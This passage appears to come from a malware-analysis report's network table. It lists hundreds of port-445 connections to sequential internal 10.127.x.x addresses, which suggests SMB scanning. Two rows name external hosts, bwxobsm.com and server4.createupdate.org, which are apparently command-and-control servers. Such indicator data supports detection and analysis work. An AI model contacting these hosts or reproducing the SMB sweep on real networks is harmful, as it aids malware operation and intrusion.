| N/A | 10.127.1.77:445 | tcp | |
| N/A | 10.127.1.122:445 | tcp | |
| N/A | 10.127.1.128:445 | tcp | |
| N/A | 10.127.1.85:445 | tcp | |
| N/A | 10.127.1.99:445 | tcp | |
| N/A | 10.127.1.127:445 | tcp | |
| N/A | 10.127.1.80:445 | tcp | |
| N/A | 10.127.1.109:445 | tcp | |
| N/A | 10.127.1.71:445 | tcp | |
| N/A | 10.127.1.107:445 | tcp | |
| N/A | 10.127.1.110:445 | tcp | |
| N/A | 10.127.1.101:445 | tcp | |
| N/A | 10.127.1.112:445 | tcp | |
| N/A | 10.127.1.96:445 | tcp | |
| N/A | 10.127.1.87:445 | tcp | |
| N/A | 10.127.1.98:445 | tcp | |
| N/A | 10.127.1.106:445 | tcp | |
| N/A | 10.127.1.114:445 | tcp | |
| N/A | 10.127.1.76:445 | tcp | |
| N/A | 10.127.1.86:445 | tcp | |
| N/A | 10.127.1.113:445 | tcp | |
| N/A | 10.127.1.78:445 | tcp | |
| N/A | 10.127.1.84:445 | tcp | |
| N/A | 10.127.1.104:445 | tcp | |
| N/A | 10.127.1.89:445 | tcp | |
| N/A | 10.127.1.95:445 | tcp | |
| N/A | 10.127.1.121:445 | tcp | |
| N/A | 10.127.1.116:445 | tcp | |
| N/A | 10.127.1.102:445 | tcp | |
| N/A | 10.127.1.118:445 | tcp | |
| N/A | 10.127.1.72:445 | tcp | |
| N/A | 10.127.1.82:445 | tcp | |
| N/A | 10.127.1.83:445 | tcp | |
| N/A | 10.127.1.97:445 | tcp | |
| N/A | 10.127.1.117:445 | tcp | |
| N/A | 10.127.1.115:445 | tcp | |
| N/A | 10.127.1.120:445 | tcp | |
| N/A | 10.127.1.73:445 | tcp | |
| N/A | 10.127.1.103:445 | tcp | |
| N/A | 10.127.1.74:445 | tcp | |
| N/A | 10.127.1.69:445 | tcp | |
| N/A | 10.127.1.90:445 | tcp | |
| N/A | 10.127.1.126:445 | tcp | |
| N/A | 10.127.1.66:445 | tcp | |
| N/A | 10.127.1.105:445 | tcp | |
| N/A | 10.127.1.68:445 | tcp | |
| N/A | 10.127.1.67:445 | tcp | |
| N/A | 10.127.1.91:445 | tcp | |
| N/A | 10.127.1.93:445 | tcp | |
| N/A | 10.127.1.111:445 | tcp | |
| N/A | 10.127.1.88:445 | tcp | |
| N/A | 10.127.1.125:445 | tcp | |
| N/A | 10.127.1.129:445 | tcp | |
| N/A | 10.127.1.154:445 | tcp | |
| N/A | 10.127.1.162:445 | tcp | |
| N/A | 10.127.1.166:445 | tcp | |
| N/A | 10.127.1.173:445 | tcp | |
| N/A | 10.127.1.184:445 | tcp | |
| N/A | 10.127.1.137:445 | tcp | |
| N/A | 10.127.1.132:445 | tcp | |
| N/A | 10.127.1.181:445 | tcp | |
| N/A | 10.127.1.131:445 | tcp | |
| N/A | 10.127.1.172:445 | tcp | |
| N/A | 10.127.1.163:445 | tcp | |
| N/A | 10.127.1.171:445 | tcp | |
| N/A | 10.127.1.142:445 | tcp | |
| N/A | 10.127.1.145:445 | tcp | |
| N/A | 10.127.1.146:445 | tcp | |
| N/A | 10.127.1.185:445 | tcp | |
| N/A | 10.127.1.138:445 | tcp | |
| N/A | 10.127.1.169:445 | tcp | |
| N/A | 10.127.1.175:445 | tcp | |
| N/A | 10.127.1.152:445 | tcp | |
| N/A | 10.127.1.186:445 | tcp | |
| N/A | 10.127.1.178:445 | tcp | |
| N/A | 10.127.1.151:445 | tcp | |
| N/A | 10.127.1.187:445 | tcp | |
| N/A | 10.127.1.192:445 | tcp | |
| N/A | 10.127.1.140:445 | tcp | |
| N/A | 10.127.1.143:445 | tcp | |
| N/A | 10.127.1.153:445 | tcp | |
| N/A | 10.127.1.168:445 | tcp | |
| N/A | 10.127.1.144:445 | tcp | |
| N/A | 10.127.1.182:445 | tcp | |
| N/A | 10.127.1.139:445 | tcp | |
| N/A | 10.127.1.136:445 | tcp | |
| N/A | 10.127.1.147:445 | tcp | |
| N/A | 10.127.1.160:445 | tcp | |
| N/A | 10.127.1.170:445 | tcp | |
| N/A | 10.127.1.157:445 | tcp | |
| N/A | 10.127.1.149:445 | tcp | |
| N/A | 10.127.1.180:445 | tcp | |
| N/A | 10.127.1.177:445 | tcp | |
| N/A | 10.127.1.161:445 | tcp | |
| N/A | 10.127.1.174:445 | tcp | |
| N/A | 10.127.1.150:445 | tcp | |
| N/A | 10.127.1.164:445 | tcp | |
| N/A | 10.127.1.167:445 | tcp | |
| N/A | 10.127.1.158:445 | tcp | |
| N/A | 10.127.1.190:445 | tcp | |
| N/A | 10.127.1.155:445 | tcp | |
| N/A | 10.127.1.179:445 | tcp | |
| N/A | 10.127.1.191:445 | tcp | |
| N/A | 10.127.1.183:445 | tcp | |
| N/A | 10.127.1.165:445 | tcp | |
| N/A | 10.127.1.130:445 | tcp | |
| N/A | 10.127.1.133:445 | tcp | |
| N/A | 10.127.1.141:445 | tcp | |
| N/A | 10.127.1.148:445 | tcp | |
| N/A | 10.127.1.135:445 | tcp | |
| N/A | 10.127.1.156:445 | tcp | |
| N/A | 10.127.1.134:445 | tcp | |
| N/A | 10.127.1.176:445 | tcp | |
| N/A | 10.127.1.159:445 | tcp | |
| N/A | 10.127.1.188:445 | tcp | |
| N/A | 10.127.1.189:445 | tcp | |
| N/A | 10.127.1.194:445 | tcp | |
| N/A | 10.127.1.225:445 | tcp | |
| N/A | 10.127.1.238:445 | tcp | |
| N/A | 10.127.1.241:445 | tcp | |
| N/A | 10.127.1.231:445 | tcp | |
| N/A | 10.127.1.250:445 | tcp | |
| N/A | 10.127.1.195:445 | tcp | |
| N/A | 10.127.1.233:445 | tcp | |
| N/A | 10.127.1.244:445 | tcp | |
| N/A | 10.127.1.232:445 | tcp | |
| N/A | 10.127.1.202:445 | tcp | |
| N/A | 10.127.1.196:445 | tcp | |
| N/A | 10.127.1.227:445 | tcp | |
| N/A | 10.127.1.221:445 | tcp | |
| N/A | 10.127.1.236:445 | tcp | |
| N/A | 10.127.1.205:445 | tcp | |
| N/A | 10.127.1.226:445 | tcp | |
| N/A | 10.127.1.198:445 | tcp | |
| N/A | 10.127.1.222:445 | tcp | |
| N/A | 10.127.1.214:445 | tcp | |
| N/A | 10.127.1.218:445 | tcp | |
| N/A | 10.127.1.245:445 | tcp | |
| N/A | 10.127.1.197:445 | tcp | |
| N/A | 10.127.1.206:445 | tcp | |
| N/A | 10.127.1.209:445 | tcp | |
| N/A | 10.127.1.240:445 | tcp | |
| N/A | 10.127.1.211:445 | tcp | |
| N/A | 10.127.1.204:445 | tcp | |
| N/A | 10.127.1.242:445 | tcp | |
| N/A | 10.127.1.223:445 | tcp | |
| N/A | 10.127.1.235:445 | tcp | |
| N/A | 10.127.1.215:445 | tcp | |
| N/A | 10.127.1.217:445 | tcp | |
| N/A | 10.127.1.220:445 | tcp | |
| N/A | 10.127.1.239:445 | tcp | |
| N/A | 10.127.1.254:445 | tcp | |
| N/A | 10.127.1.253:445 | tcp | |
| N/A | 10.127.1.203:445 | tcp | |
| N/A | 10.127.1.193:445 | tcp | |
| N/A | 10.127.1.249:445 | tcp | |
| N/A | 10.127.1.255:445 | tcp | |
| N/A | 10.127.1.213:445 | tcp | |
| N/A | 10.127.1.247:445 | tcp | |
| N/A | 10.127.1.237:445 | tcp | |
| N/A | 10.127.1.224:445 | tcp | |
| N/A | 10.127.1.243:445 | tcp | |
| N/A | 10.127.1.200:445 | tcp | |
| N/A | 10.127.1.199:445 | tcp | |
| N/A | 10.127.1.210:445 | tcp | |
| N/A | 10.127.1.219:445 | tcp | |
| N/A | 10.127.1.229:445 | tcp | |
| N/A | 10.127.1.228:445 | tcp | |
| N/A | 10.127.1.207:445 | tcp | |
| N/A | 10.127.1.252:445 | tcp | |
| N/A | 10.127.1.208:445 | tcp | |
| N/A | 10.127.1.251:445 | tcp | |
| N/A | 10.127.1.246:445 | tcp | |
| N/A | 10.127.1.212:445 | tcp | |
| N/A | 10.127.1.216:445 | tcp | |
| N/A | 10.127.1.230:445 | tcp | |
| N/A | 10.127.1.234:445 | tcp | |
| N/A | 10.127.2.0:445 | tcp | |
| N/A | 10.127.1.201:445 | tcp | |
| N/A | 10.127.1.248:445 | tcp | |
| N/A | 10.127.2.6:445 | tcp | |
| N/A | 10.127.2.8:445 | tcp | |
| N/A | 10.127.2.49:445 | tcp | |
| N/A | 10.127.2.53:445 | tcp | |
| N/A | 10.127.2.13:445 | tcp | |
| N/A | 10.127.2.61:445 | tcp | |
| N/A | 10.127.2.31:445 | tcp | |
| N/A | 10.127.2.37:445 | tcp | |
| N/A | 10.127.2.55:445 | tcp | |
| N/A | 10.127.2.57:445 | tcp | |
| N/A | 10.127.2.5:445 | tcp | |
| N/A | 10.127.2.59:445 | tcp | |
| N/A | 10.127.2.19:445 | tcp | |
| N/A | 10.127.2.2:445 | tcp | |
| N/A | 10.127.2.30:445 | tcp | |
| N/A | 10.127.2.24:445 | tcp | |
| N/A | 10.127.2.7:445 | tcp | |
| N/A | 10.127.2.1:445 | tcp | |
| N/A | 10.127.2.12:445 | tcp | |
| N/A | 10.127.2.28:445 | tcp | |
| N/A | 10.127.2.50:445 | tcp | |
| N/A | 10.127.2.47:445 | tcp | |
| N/A | 10.127.2.39:445 | tcp | |
| N/A | 10.127.2.45:445 | tcp | |
| N/A | 10.127.2.62:445 | tcp | |
| N/A | 10.127.2.18:445 | tcp | |
| N/A | 10.127.2.11:445 | tcp | |
| N/A | 10.127.2.26:445 | tcp | |
| N/A | 10.127.2.14:445 | tcp | |
| N/A | 10.127.2.51:445 | tcp | |
| N/A | 10.127.2.60:445 | tcp | |
| N/A | 10.127.2.17:445 | tcp | |
| N/A | 10.127.2.4:445 | tcp | |
| N/A | 10.127.2.54:445 | tcp | |
| N/A | 10.127.2.63:445 | tcp | |
| N/A | 10.127.2.3:445 | tcp | |
| N/A | 10.127.2.22:445 | tcp | |
| N/A | 10.127.2.33:445 | tcp | |
| N/A | 10.127.2.36:445 | tcp | |
| N/A | 10.127.2.16:445 | tcp | |
| N/A | 10.127.2.40:445 | tcp | |
| N/A | 10.127.2.42:445 | tcp | |
| N/A | 10.127.2.64:445 | tcp | |
| N/A | 10.127.2.58:445 | tcp | |
| N/A | 10.127.2.9:445 | tcp | |
| N/A | 10.127.2.41:445 | tcp | |
| N/A | 10.127.2.48:445 | tcp | |
| N/A | 10.127.2.38:445 | tcp | |
| N/A | 10.127.2.44:445 | tcp | |
| N/A | 10.127.2.21:445 | tcp | |
| N/A | 10.127.2.20:445 | tcp | |
| N/A | 10.127.2.25:445 | tcp | |
| N/A | 10.127.2.35:445 | tcp | |
| N/A | 10.127.2.10:445 | tcp | |
| N/A | 10.127.2.52:445 | tcp | |
| N/A | 10.127.2.23:445 | tcp | |
| N/A | 10.127.2.46:445 | tcp | |
| N/A | 10.127.2.29:445 | tcp | |
| N/A | 10.127.2.15:445 | tcp | |
| N/A | 10.127.2.56:445 | tcp | |
| N/A | 10.127.2.27:445 | tcp | |
| N/A | 10.127.2.34:445 | tcp | |
| N/A | 10.127.2.43:445 | tcp | |
| N/A | 10.127.2.32:445 | tcp | |
| N/A | 10.127.2.65:445 | tcp | |
| N/A | 10.127.2.89:445 | tcp | |
| N/A | 10.127.2.92:445 | tcp | |
| N/A | 10.127.2.127:445 | tcp | |
| N/A | 10.127.2.103:445 | tcp | |
| N/A | 10.127.2.110:445 | tcp | |
| N/A | 10.127.2.69:445 | tcp | |
| N/A | 10.127.2.94:445 | tcp | |
| N/A | 10.127.2.114:445 | tcp | |
| N/A | 10.127.2.118:445 | tcp | |
| N/A | 10.127.2.66:445 | tcp | |
| N/A | 10.127.2.86:445 | tcp | |
| N/A | 10.127.2.97:445 | tcp | |
| N/A | 10.127.2.73:445 | tcp | |
| N/A | 10.127.2.76:445 | tcp | |
| N/A | 10.127.2.91:445 | tcp | |
| N/A | 10.127.2.106:445 | tcp | |
| N/A | 10.127.2.125:445 | tcp | |
| N/A | 10.127.2.80:445 | tcp | |
| N/A | 10.127.2.84:445 | tcp | |
| N/A | 10.127.2.67:445 | tcp | |
| N/A | 10.127.2.101:445 | tcp | |
| N/A | 10.127.2.74:445 | tcp | |
| N/A | 10.127.2.85:445 | tcp | |
| N/A | 10.127.2.88:445 | tcp | |
| N/A | 10.127.2.107:445 | tcp | |
| N/A | 10.127.2.128:445 | tcp | |
| N/A | 10.127.2.113:445 | tcp | |
| N/A | 10.127.2.122:445 | tcp | |
| N/A | 10.127.2.102:445 | tcp | |
| N/A | 10.127.2.68:445 | tcp | |
| N/A | 10.127.2.100:445 | tcp | |
| N/A | 10.127.2.117:445 | tcp | |
| N/A | 10.127.2.123:445 | tcp | |
| N/A | 10.127.2.83:445 | tcp | |
| N/A | 10.127.2.81:445 | tcp | |
| N/A | 10.127.2.75:445 | tcp | |
| N/A | 10.127.2.115:445 | tcp | |
| N/A | 10.127.2.78:445 | tcp | |
| N/A | 10.127.2.87:445 | tcp | |
| N/A | 10.127.2.105:445 | tcp | |
| N/A | 10.127.2.111:445 | tcp | |
| N/A | 10.127.2.119:445 | tcp | |
| N/A | 10.127.2.116:445 | tcp | |
| N/A | 10.127.2.70:445 | tcp | |
| N/A | 10.127.2.95:445 | tcp | |
| N/A | 10.127.2.121:445 | tcp | |
| N/A | 10.127.2.79:445 | tcp | |
| N/A | 10.127.2.90:445 | tcp | |
| N/A | 10.127.2.126:445 | tcp | |
| N/A | 10.127.2.99:445 | tcp | |
| N/A | 10.127.2.108:445 | tcp | |
| N/A | 10.127.2.96:445 | tcp | |
| N/A | 10.127.2.112:445 | tcp | |
| N/A | 10.127.2.72:445 | tcp | |
| N/A | 10.127.2.82:445 | tcp | |
| N/A | 10.127.2.104:445 | tcp | |
| N/A | 10.127.2.98:445 | tcp | |
| N/A | 10.127.2.120:445 | tcp | |
| N/A | 10.127.2.71:445 | tcp | |
| N/A | 10.127.2.109:445 | tcp | |
| N/A | 10.127.2.77:445 | tcp | |
| N/A | 10.127.2.93:445 | tcp | |
| N/A | 10.127.2.124:445 | tcp | |
| N/A | 10.127.2.140:445 | tcp | |
| N/A | 10.127.2.175:445 | tcp | |
| N/A | 10.127.2.158:445 | tcp | |
| N/A | 10.127.2.186:445 | tcp | |
| N/A | 10.127.2.157:445 | tcp | |
| N/A | 10.127.2.144:445 | tcp | |
| N/A | 10.127.2.190:445 | tcp | |
| N/A | 10.127.2.174:445 | tcp | |
| N/A | 10.127.2.177:445 | tcp | |
| N/A | 10.127.2.148:445 | tcp | |
| N/A | 10.127.2.150:445 | tcp | |
| N/A | 10.127.2.178:445 | tcp | |
| N/A | 10.127.2.168:445 | tcp | |
| N/A | 10.127.2.176:445 | tcp | |
| N/A | 10.127.2.183:445 | tcp | |
| N/A | 10.127.2.132:445 | tcp | |
| N/A | 10.127.2.147:445 | tcp | |
| N/A | 10.127.2.163:445 | tcp | |
| N/A | 10.127.2.142:445 | tcp | |
| N/A | 10.127.2.137:445 | tcp | |
| N/A | 10.127.2.166:445 | tcp | |
| N/A | 10.127.2.136:445 | tcp | |
| N/A | 10.127.2.191:445 | tcp | |
| N/A | 10.127.2.129:445 | tcp | |
| N/A | 10.127.2.138:445 | tcp | |
| N/A | 10.127.2.146:445 | tcp | |
| N/A | 10.127.2.154:445 | tcp | |
| N/A | 10.127.2.135:445 | tcp | |
| N/A | 10.127.2.160:445 | tcp | |
| N/A | 10.127.2.172:445 | tcp | |
| N/A | 10.127.2.141:445 | tcp | |
| N/A | 10.127.2.151:445 | tcp | |
| N/A | 10.127.2.180:445 | tcp | |
| N/A | 10.127.2.143:445 | tcp | |
| N/A | 10.127.2.162:445 | tcp | |
| N/A | 10.127.2.185:445 | tcp | |
| N/A | 10.127.2.156:445 | tcp | |
| N/A | 10.127.2.179:445 | tcp | |
| N/A | 10.127.2.130:445 | tcp | |
| N/A | 10.127.2.161:445 | tcp | |
| N/A | 10.127.2.131:445 | tcp | |
| N/A | 10.127.2.192:445 | tcp | |
| N/A | 10.127.2.133:445 | tcp | |
| N/A | 10.127.2.134:445 | tcp | |
| N/A | 10.127.2.169:445 | tcp | |
| N/A | 10.127.2.182:445 | tcp | |
| N/A | 10.127.2.145:445 | tcp | |
| N/A | 10.127.2.149:445 | tcp | |
| N/A | 10.127.2.181:445 | tcp | |
| N/A | 10.127.2.155:445 | tcp | |
| N/A | 10.127.2.188:445 | tcp | |
| N/A | 10.127.2.152:445 | tcp | |
| N/A | 10.127.2.159:445 | tcp | |
| N/A | 10.127.2.187:445 | tcp | |
| N/A | 10.127.2.139:445 | tcp | |
| N/A | 10.127.2.153:445 | tcp | |
| N/A | 10.127.2.165:445 | tcp | |
| N/A | 10.127.2.189:445 | tcp | |
| N/A | 10.127.2.184:445 | tcp | |
| N/A | 10.127.2.167:445 | tcp | |
| N/A | 10.127.2.170:445 | tcp | |
| N/A | 10.127.2.173:445 | tcp | |
| N/A | 10.127.2.164:445 | tcp | |
| N/A | 10.127.2.171:445 | tcp | |
| N/A | 10.127.2.193:445 | tcp | |
| TR | 195.16.74.230:80 | bwxobsm.com | tcp |
| N/A | 10.127.2.230:445 | tcp | |
| N/A | 10.127.2.244:445 | tcp | |
| N/A | 10.127.2.252:445 | tcp | |
| N/A | 10.127.2.197:445 | tcp | |
| N/A | 10.127.2.209:445 | tcp | |
| N/A | 10.127.2.221:445 | tcp | |
| N/A | 10.127.2.196:445 | tcp | |
| N/A | 10.127.2.224:445 | tcp | |
| N/A | 10.127.2.234:445 | tcp | |
| N/A | 10.127.2.253:445 | tcp | |
| N/A | 10.127.2.202:445 | tcp | |
| N/A | 10.127.2.205:445 | tcp | |
| N/A | 10.127.2.236:445 | tcp | |
| N/A | 10.127.2.212:445 | tcp | |
| N/A | 10.127.2.211:445 | tcp | |
| N/A | 10.127.2.232:445 | tcp | |
| N/A | 10.127.2.199:445 | tcp | |
| N/A | 10.127.2.223:445 | tcp | |
| N/A | 10.127.2.251:445 | tcp | |
| N/A | 10.127.2.228:445 | tcp | |
| N/A | 10.127.2.207:445 | tcp | |
| N/A | 10.127.2.237:445 | tcp | |
| N/A | 10.127.2.206:445 | tcp | |
| N/A | 10.127.2.219:445 | tcp | |
| N/A | 10.127.2.231:445 | tcp | |
| N/A | 10.127.2.200:445 | tcp | |
| N/A | 10.127.2.235:445 | tcp | |
| N/A | 10.127.2.216:445 | tcp | |
| N/A | 10.127.2.245:445 | tcp | |
| N/A | 10.127.2.213:445 | tcp | |
| N/A | 10.127.2.240:445 | tcp | |
| N/A | 10.127.2.246:445 | tcp | |
| N/A | 10.127.2.250:445 | tcp | |
| N/A | 10.127.2.254:445 | tcp | |
| N/A | 10.127.2.255:445 | tcp | |
| N/A | 10.127.2.198:445 | tcp | |
| N/A | 10.127.2.220:445 | tcp | |
| N/A | 10.127.2.225:445 | tcp | |
| N/A | 10.127.2.210:445 | tcp | |
| N/A | 10.127.2.239:445 | tcp | |
| N/A | 10.127.2.204:445 | tcp | |
| N/A | 10.127.2.222:445 | tcp | |
| N/A | 10.127.2.241:445 | tcp | |
| N/A | 10.127.2.218:445 | tcp | |
| N/A | 10.127.2.242:445 | tcp | |
| N/A | 10.127.2.249:445 | tcp | |
| N/A | 10.127.2.208:445 | tcp | |
| N/A | 10.127.2.214:445 | tcp | |
| N/A | 10.127.2.227:445 | tcp | |
| N/A | 10.127.2.243:445 | tcp | |
| N/A | 10.127.2.203:445 | tcp | |
| N/A | 10.127.2.215:445 | tcp | |
| N/A | 10.127.2.201:445 | tcp | |
| N/A | 10.127.2.229:445 | tcp | |
| N/A | 10.127.2.248:445 | tcp | |
| N/A | 10.127.2.233:445 | tcp | |
| N/A | 10.127.2.226:445 | tcp | |
| N/A | 10.127.3.0:445 | tcp | |
| N/A | 10.127.2.194:445 | tcp | |
| N/A | 10.127.2.247:445 | tcp | |
| N/A | 10.127.2.217:445 | tcp | |
| N/A | 10.127.2.195:445 | tcp | |
| N/A | 10.127.2.238:445 | tcp | |
| BG | 185.82.216.104:443 | server4.createupdate.org | tcp |
| N/A | 10.127.3.1:445 | tcp | |
| N/A | 10.127.3.24:445 | tcp | |
| N/A | 10.127.3.44:445 | tcp | |
| N/A | 10.127.3.31:445 | tcp | |
| N/A | 10.127.3.37:445 | tcp | |
| N/A | 10.127.3.39:445 | tcp | |
| N/A | 10.127.3.56:445 | tcp | |
| N/A | 10.127.3.58:445 | tcp | |
| N/A | 10.127.3.41:445 | tcp | |
| N/A | 10.127.3.45:445 | tcp | |
| N/A | 10.127.3.42:445 | tcp | |
| N/A | 10.127.3.8:445 | tcp | |
| N/A | 10.127.3.33:445 | tcp | |
| N/A | 10.127.3.25:445 | tcp | |
| N/A | 10.127.3.63:445 | tcp | |
| N/A | 10.127.3.53:445 | tcp | |
| N/A | 10.127.3.13:445 | tcp | |
| N/A | 10.127.3.18:445 | tcp | |
| N/A | 10.127.3.38:445 | tcp | |
| N/A | 10.127.3.61:445 | tcp | |
| N/A | 10.127.3.16:445 | tcp | |
| N/A | 10.127.3.34:445 | tcp | |
| N/A | 10.127.3.20:445 | tcp | |
| N/A | 10.127.3.10:445 | tcp | |
| N/A | 10.127.3.43:445 | tcp | |
| N/A | 10.127.3.4:445 | tcp | |
| N/A | 10.127.3.59:445 | tcp | |
| N/A | 10.127.3.36:445 | tcp | |
| N/A | 10.127.3.23:445 | tcp | |
| N/A | 10.127.3.35:445 | tcp | |
| N/A | 10.127.3.40:445 | tcp | |
| N/A | 10.127.3.12:445 | tcp | |
| N/A | 10.127.3.47:445 | tcp | |
| N/A | 10.127.3.9:445 | tcp | |
| N/A | 10.127.3.3:445 | tcp | |
| N/A | 10.127.3.14:445 | tcp | |
| N/A | 10.127.3.17:445 | tcp | |
| N/A | 10.127.3.50:445 | tcp | |
| N/A | 10.127.3.5:445 | tcp | |
| N/A | 10.127.3.51:445 | tcp | |
| N/A | 10.127.3.64:445 | tcp | |
| N/A | 10.127.3.29:445 | tcp | |
| N/A | 10.127.3.28:445 | tcp | |
| N/A | 10.127.3.11:445 | tcp | |
| N/A | 10.127.3.55:445 | tcp | |
| N/A | 10.127.3.19:445 | tcp | |
| N/A | 10.127.3.26:445 | tcp | |
| N/A | 10.127.3.54:445 | tcp | |
| N/A | 10.127.3.22:445 | tcp | |
| N/A | 10.127.3.2:445 | tcp | |
| N/A | 10.127.3.15:445 | tcp | |
| N/A | 10.127.3.30:445 | tcp | |
| N/A | 10.127.3.27:445 | tcp | |
| N/A | 10.127.3.48:445 | tcp | |
| N/A | 10.127.3.46:445 | tcp | |
| N/A | 10.127.3.21:445 | tcp | |
| N/A | 10.127.3.49:445 | tcp | |
| N/A | 10.127.3.32:445 | tcp | |
| N/A | 10.127.3.60:445 | tcp | |
| N/A | 10.127.3.52:445 | tcp | |
| N/A | 10.127.3.57:445 | tcp | |
| N/A | 10.127.3.6:445 | tcp | |
| N/A | 10.127.3.62:445 | tcp | |
| N/A | 10.127.3.7:445 | tcp | |
| N/A | 10.127.3.65:445 | tcp | |
| N/A | 10.127.3.90:445 | tcp | |
| N/A | 10.127.3.94:445 | tcp | |
| N/A | 10.127.3.91:445 | tcp | |
| N/A | 10.127.3.85:445 | tcp | |
| N/A | 10.127.3.115:445 | tcp | |
| N/A | 10.127.3.127:445 | tcp | |
| N/A | 10.127.3.96:445 | tcp | |
| N/A | 10.127.3.114:445 | tcp | |
| N/A | 10.127.3.87:445 | tcp | |
| N/A | 10.127.3.105:445 | tcp | |
| N/A | 10.127.3.116:445 | tcp | |
| N/A | 10.127.3.126:445 | tcp | |
| N/A | 10.127.3.100:445 | tcp | |
| N/A | 10.127.3.71:445 | tcp | |
| N/A | 10.127.3.75:445 | tcp | |
| N/A | 10.127.3.109:445 | tcp | |
| N/A | 10.127.3.125:445 | tcp | |
| N/A | 10.127.3.124:445 | tcp | |
| N/A | 10.127.3.122:445 | tcp | |
| N/A | 10.127.3.72:445 | tcp | |
| N/A | 10.127.3.98:445 | tcp | |
| N/A | 10.127.3.79:445 | tcp | |
| N/A | 10.127.3.82:445 | tcp | |
| N/A | 10.127.3.111:445 | tcp | |
| N/A | 10.127.3.108:445 | tcp | |
| N/A | 10.127.3.102:445 | tcp | |
| N/A | 10.127.3.69:445 | tcp | |
| N/A | 10.127.3.97:445 | tcp | |
| N/A | 10.127.3.107:445 | tcp | |
| N/A | 10.127.3.83:445 | tcp | |
| N/A | 10.127.3.95:445 | tcp | |
| N/A | 10.127.3.86:445 | tcp | |
| N/A | 10.127.3.68:445 | tcp | |
| N/A | 10.127.3.76:445 | tcp | |
| N/A | 10.127.3.117:445 | tcp | |
| N/A | 10.127.3.88:445 | tcp | |
| N/A | 10.127.3.81:445 | tcp | |
| N/A | 10.127.3.89:445 | tcp | |
| N/A | 10.127.3.104:445 | tcp | |
| N/A | 10.127.3.74:445 | tcp | |
| N/A | 10.127.3.123:445 | tcp | |
| N/A | 10.127.3.66:445 | tcp | |
| N/A | 10.127.3.67:445 | tcp | |
| N/A | 10.127.3.128:445 | tcp | |
| N/A | 10.127.3.73:445 | tcp | |
| N/A | 10.127.3.120:445 | tcp | |
| N/A | 10.127.3.77:445 | tcp | |
| N/A | 10.127.3.70:445 | tcp | |
| N/A | 10.127.3.101:445 | tcp | |
| N/A | 10.127.3.93:445 | tcp | |
| N/A | 10.127.3.103:445 | tcp | |
| N/A | 10.127.3.113:445 | tcp | |
| N/A | 10.127.3.112:445 | tcp | |
| N/A | 10.127.3.92:445 | tcp | |
| N/A | 10.127.3.118:445 | tcp | |
| N/A | 10.127.3.99:445 | tcp | |
| N/A | 10.127.3.121:445 | tcp | |
| N/A | 10.127.3.110:445 | tcp | |
| N/A | 10.127.3.80:445 | tcp | |
| N/A | 10.127.3.119:445 | tcp | |
| N/A | 10.127.3.106:445 | tcp | |
| N/A | 10.127.3.78:445 | tcp | |
| N/A | 10.127.3.84:445 | tcp | |
| N/A | 10.127.3.129:445 | tcp | |
| N/A | 10.127.3.159:445 | tcp | |
| N/A | 10.127.3.183:445 | tcp | |
| N/A | 10.127.3.144:445 | tcp | |
| N/A | 10.127.3.172:445 | tcp | |
| N/A | 10.127.3.177:445 | tcp | |
| N/A | 10.127.3.136:445 | tcp | |
| N/A | 10.127.3.187:445 | tcp | |
| N/A | 10.127.3.167:445 | tcp | |
| N/A | 10.127.3.181:445 | tcp | |
| N/A | 10.127.3.186:445 | tcp | |
| N/A | 10.127.3.146:445 | tcp | |
| N/A | 10.127.3.141:445 | tcp | |
| N/A | 10.127.3.191:445 | tcp | |
| N/A | 10.127.3.155:445 | tcp | |
| N/A | 10.127.3.185:445 | tcp | |
| N/A | 10.127.3.158:445 | tcp | |
| N/A | 10.127.3.176:445 | tcp | |
| N/A | 10.127.3.151:445 | tcp | |
| N/A | 10.127.3.130:445 | tcp | |
| N/A | 10.127.3.164:445 | tcp | |
| N/A | 10.127.3.169:445 | tcp | |
| N/A | 10.127.3.149:445 | tcp | |
| N/A | 10.127.3.192:445 | tcp | |
| N/A | 10.127.3.131:445 | tcp | |
| N/A | 10.127.3.134:445 | tcp | |
| N/A | 10.127.3.135:445 | tcp | |
| N/A | 10.127.3.142:445 | tcp | |
| N/A | 10.127.3.173:445 | tcp | |
| N/A | 10.127.3.174:445 | tcp | |
| N/A | 10.127.3.165:445 | tcp | |
| N/A | 10.127.3.139:445 | tcp | |
| N/A | 10.127.3.161:445 | tcp | |
| N/A | 10.127.3.171:445 | tcp | |
| N/A | 10.127.3.147:445 | tcp | |
| N/A | 10.127.3.157:445 | tcp | |
| N/A | 10.127.3.184:445 | tcp | |
| N/A | 10.127.3.180:445 | tcp | |
| N/A | 10.127.3.152:445 | tcp | |
| N/A | 10.127.3.132:445 | tcp | |
| N/A | 10.127.3.140:445 | tcp | |
| N/A | 10.127.3.153:445 | tcp | |
| N/A | 10.127.3.168:445 | tcp | |
| N/A | 10.127.3.145:445 | tcp | |
| N/A | 10.127.3.137:445 | tcp | |
| N/A | 10.127.3.170:445 | tcp | |
| N/A | 10.127.3.148:445 | tcp | |
| N/A | 10.127.3.190:445 | tcp | |
| N/A | 10.127.3.178:445 | tcp | |
| N/A | 10.127.3.133:445 | tcp | |
| N/A | 10.127.3.163:445 | tcp | |
| N/A | 10.127.3.154:445 | tcp | |
| N/A | 10.127.3.156:445 | tcp | |
| N/A | 10.127.3.166:445 | tcp | |
| N/A | 10.127.3.179:445 | tcp | |
| N/A | 10.127.3.189:445 | tcp | |
| N/A | 10.127.3.175:445 | tcp | |
| N/A | 10.127.3.150:445 | tcp | |
| N/A | 10.127.3.182:445 | tcp | |
| N/A | 10.127.3.162:445 | tcp | |
| N/A | 10.127.3.188:445 | tcp | |
| N/A | 10.127.3.160:445 | tcp | |
| N/A | 10.127.3.143:445 | tcp | |
| N/A | 10.127.3.138:445 | tcp | |
| N/A | 10.127.3.202:445 | tcp | |
| N/A | 10.127.3.199:445 | tcp | |
| N/A | 10.127.3.205:445 | tcp | |
| N/A | 10.127.3.212:445 | tcp | |
| N/A | 10.127.4.0:445 | tcp | |
| N/A | 10.127.3.218:445 | tcp | |
| N/A | 10.127.3.201:445 | tcp | |
| N/A | 10.127.3.200:445 | tcp | |
| N/A | 10.127.3.195:445 | tcp | |
| N/A | 10.127.3.229:445 | tcp | |
| N/A | 10.127.3.198:445 | tcp | |
| N/A | 10.127.3.217:445 | tcp | |
| N/A | 10.127.3.221:445 | tcp | |
| N/A | 10.127.3.243:445 | tcp | |
| N/A | 10.127.3.230:445 | tcp | |
| N/A | 10.127.3.215:445 | tcp | |
| N/A | 10.127.3.227:445 | tcp | |
| N/A | 10.127.3.222:445 | tcp | |
| N/A | 10.127.3.244:445 | tcp | |
| N/A | 10.127.3.219:445 | tcp | |
| N/A | 10.127.3.210:445 | tcp | |
